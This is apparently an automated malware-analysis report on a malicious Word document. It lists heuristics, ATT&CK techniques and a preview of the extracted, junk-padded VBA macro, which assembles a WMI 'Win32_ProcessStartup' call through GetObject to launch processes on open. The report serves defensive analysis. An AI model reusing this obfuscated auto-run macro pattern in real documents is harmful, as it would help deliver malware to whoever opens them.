Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is an Office document with a high heuristic score for OLE slack anomalies and the presence of VBA macros. The AutoOpen macro and GetObject call indicate malicious intent. The VBA code is heavily obfuscated, making it difficult to determine the exact payload, but it is highly likely to download and execute a second-stage payload. The document body is unreadable binary data, providing no contextual clues.
Heuristics (5)

- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): OLE file is 198,933 bytes but its declared streams total only 86,618 bytes; the remaining 112,315 bytes (56%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro present.
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call present.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 53377 bytes | 39b9db656f585d0f6e73e122a2ce2ed8492e5a9b879b70866a650d2d3a0c76e9 |
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "W03649"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "S00531__"
Function V003___()
Select Case W71__0
Case 403329919
Set j1635_1_ = n7667_
V981745_ = (R2180_7 * Fix(221096868 / CBool(B99_2_))) - D18_4__1 / Oct(324891223) / 655895788 + CStr(v9868_) - 106392305 + ChrB(Y_4_5___)
Set h060218_ = h9_9_56
End Select
Select Case R38_167
Case 919499308
Set N_5_541_ = w_8017_
s703806_ = (k387_8 * Fix(704734942 / CBool(Z662_5))) - h__974_ / Oct(154980682) / 345639957 + CStr(n2_78_34) - 367700787 + ChrB(E500_97)
Set r14___64 = O8__129
End Select
Select Case J_010_
Case 611073831
Set K64_11 = v70533
q226223 = (Z194622 * Fix(689601851 / CBool(A53_860))) - G_1_68 / Oct(871099858) / 767659880 + CStr(u13488_) - 540957513 + ChrB(R895_54)
Set b1791_ = P407592
End Select
Select Case j7_0975
Case 935710513
Set z_9_589 = t150__
P53__4 = (t8_996_0 * Fix(344385580 / CBool(i47_842))) - Q_2_851 / Oct(585616498) / 371637813 + CStr(b5_7__) - 495982459 + ChrB(D96277_)
Set h096_82 = F4665_7_
End Select
Select Case t059655_
Case 387890685
Set p_1640 = E490_65
O_70_493 = (a_077_3 * Fix(772027418 / CBool(r2_26084))) - L1_780 / Oct(437008989) / 617568502 + CStr(T4_57_6_) - 149238781 + ChrB(h4_13_64)
Set S3237_3_ = i_6695
End Select
Select Case F__760_9
Case 10472895
Set M031__2 = t6565_
E_2_2_9 = (i3__6__ * Fix(376333391 / CBool(d688917))) - j6279672 / Oct(452916432) / 866412782 + CStr(d155_958) - 643856433 + ChrB(P68285)
Set f__62905 = h88_9153
End Select
End Function
Function i_869024(w__382, J7156_2)
On Error Resume Next
Select Case T5420_
Case 44125887
Set G0842_7_ = u884118
a_43356 = (F_0380 * Fix(823499921 / CBool(i2_810))) - W_1313_ / Oct(655267860) / 687012151 + CStr(b5_097__) - 956213578 + ChrB(r76__0)
Set s82__95_ = l7_9_2__
End Select
Select Case d6__63_2
Case 583333181
Set E6_806 = i97_8__
v715__45 = (r5_873 * Fix(275827680 / CBool(K__6_4))) - E85192 / Oct(992204911) / 221834429 + CStr(s3004_37) - 204214098 + ChrB(A0489_)
Set G31483_7 = I_5666
End Select
S_1__95 = i1371_2 + "winm" + "gmts:Win32" + D7_414_9 + "_ProcessStartup" + F7771412
Select Case D0605707
Case 890763360
Set m474_0 = G8464_
f7567469 = (H34191 * Fix(693978343 / CBool(o____06_))) - O3_1_2_8 / Oct(612441167) / 736864485 + CStr(s__82_2_) - 262658177 + ChrB(H8_9070)
Set N_1_63 = i72_5_22
End Select
Select Case a42_6_
Case 589276965
Set a8475982 = m60_37
i2588257 = (z_774003 * Fix(129569388 / CBool(r4453_))) - W_69__38 / Oct(966036698) / 30912404 + CStr(r2_209) - 282560103 + ChrB(E_55__)
Set J55901 = R7712_2
End Select
Select Case K832_42
Case 377019018
Set w910538 = w_6__0
h7_2_6_4 = (C_00_4 * Fix(321035134 / CBool(i04__927))) - h56487__ / Oct(444476268) / 87095537 + CStr(U537854) - 875676868 + ChrB(D_21681)
Set v_760002 = Q___45
End Select
t965769_ = c_28989 + "winm" + "gmts:Win32" + Y52_04 + "_Process" + q13_63
Select Case m684_17
Case 337052983
Set b791__8 = S14_3_4
M194831 = (k__6_325 * Fix(892570338 / CBool(Z_3822))) - j559322 / Oct(592237208) / 796550443 + CStr(V152__7_) - 252186410 + ChrB(u128_4_)
Set Z08_86 = N0951104
End Select
Select Case l4___6_1
Case 732360738
Set D69654 = T69851
i801778_ = (c910127 * Fix(840157709 / CBool(W796298))) - n9_201 / Oct(508443468) / 71530223 + CStr(i_94_02_) - 725619320 + ChrB(B87253_)
Set r_3_6_07 = a1_11__
End Select
Set W_8_52_ = GetObject(z9__8_2 + S_1__95 + T_8_8_)
Select Case z1270743
Case 269622591
Set j7603_ = j_6866_7
U466_0_9 = (u43422 * Fix(830687889 / CBool(A__102))) - b_1__85 / Oct(867945863) / 796508604 + CStr(i0_976) - 952874986 + ChrB(I658870_)
Set k5_33_ = v0_654
End Select
Select Case P9439_
Case 793654361
Set
... (truncated)
```